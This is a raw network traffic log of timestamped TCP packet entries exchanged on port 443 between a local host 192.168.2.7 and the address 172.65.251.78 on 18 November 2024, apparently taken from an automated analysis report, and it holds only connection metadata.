                                                                                                                                                                                                              Nov 18, 2024 08:35:27.429888010 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.429888010 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.429893970 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.429919958 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.429933071 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430212021 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430218935 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430303097 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430321932 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430376053 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430376053 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430381060 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430392027 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430490017 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430502892 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430557966 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430577040 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430614948 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430614948 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430625916 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430640936 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430641890 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430799007 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430811882 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430855036 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430875063 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430965900 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430965900 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430965900 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.430979013 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431093931 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431097984 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431103945 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431135893 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431153059 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431159019 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431207895 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431207895 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431293964 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431309938 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431494951 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431520939 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431521893 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431521893 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431535006 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431711912 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431725025 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431823969 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431823969 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431823969 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431840897 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431956053 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.431982994 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432039022 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432065010 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432081938 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432081938 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432095051 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432235956 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432255030 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432272911 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432272911 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432285070 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432481050 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432492971 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432521105 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432521105 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432521105 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432537079 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432641983 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432663918 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432679892 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432679892 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432679892 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432679892 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432691097 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432710886 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432724953 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432743073 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432743073 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432751894 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432905912 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432905912 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432941914 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432955980 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.432992935 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433000088 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433053970 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433053970 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433156967 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433171034 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433209896 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433216095 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433265924 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433265924 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433309078 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433321953 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433370113 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433374882 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433499098 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433518887 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433551073 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433551073 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433557987 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433610916 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433610916 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433682919 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433697939 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433809996 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433837891 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433881044 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433881044 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433881044 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433881044 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433892012 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433984995 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.433998108 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434065104 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434065104 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434077024 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434155941 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434175014 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434257030 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434269905 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434351921 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434351921 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434351921 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434351921 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434365034 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434431076 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434524059 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434542894 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434597969 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434624910 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434663057 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434663057 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434679031 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434698105 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434848070 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434860945 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434905052 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434923887 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434971094 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434971094 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434971094 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434981108 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.434998989 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435038090 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435076952 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435168982 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435183048 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435287952 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435319901 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435338974 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435338974 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435347080 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435401917 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435473919 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435487986 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435544968 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435544968 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435559988 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435703993 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435724020 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435817957 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435831070 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435837030 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435847998 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435892105 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435892105 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.435903072 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436033010 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436048031 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436141968 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436141968 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436153889 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436288118 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436307907 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436312914 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436321974 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436383963 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436399937 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436603069 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436623096 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436690092 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436758995 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436758995 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436758995 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436758995 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436758995 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436758995 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436758995 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436772108 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436783075 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436877966 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436979055 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.436996937 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.437169075 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.437169075 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.437176943 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.437350988 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.441788912 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.442327976 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.442348957 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.442409992 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.442415953 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.442471981 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.442826033 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461165905 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461189985 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461329937 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461375952 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461724997 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461740971 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461750031 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461750031 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461750031 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461762905 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461882114 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461889029 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461889029 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461904049 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461915016 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461932898 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.461968899 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.462131023 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.462142944 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.462447882 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.462447882 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.462456942 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.511142015 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.691706896 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.691734076 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.691792011 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.691823959 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.691869020 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692209959 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692209959 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692223072 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692231894 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692251921 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692267895 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692286015 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692414045 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692437887 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692475080 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692475080 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692483902 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692513943 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692605019 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692622900 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692724943 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692744970 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692806959 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692806959 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692806959 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692806959 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692816019 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692955971 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692970991 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692975998 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.692987919 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693115950 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693139076 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693190098 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693190098 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693200111 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693290949 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693310022 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693413973 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693434000 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693603039 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693603039 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693603992 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693603992 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693603992 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693603992 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693614960 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693875074 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693895102 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693952084 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.693970919 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.694025040 CET44349744172.65.251.78192.168.2.7
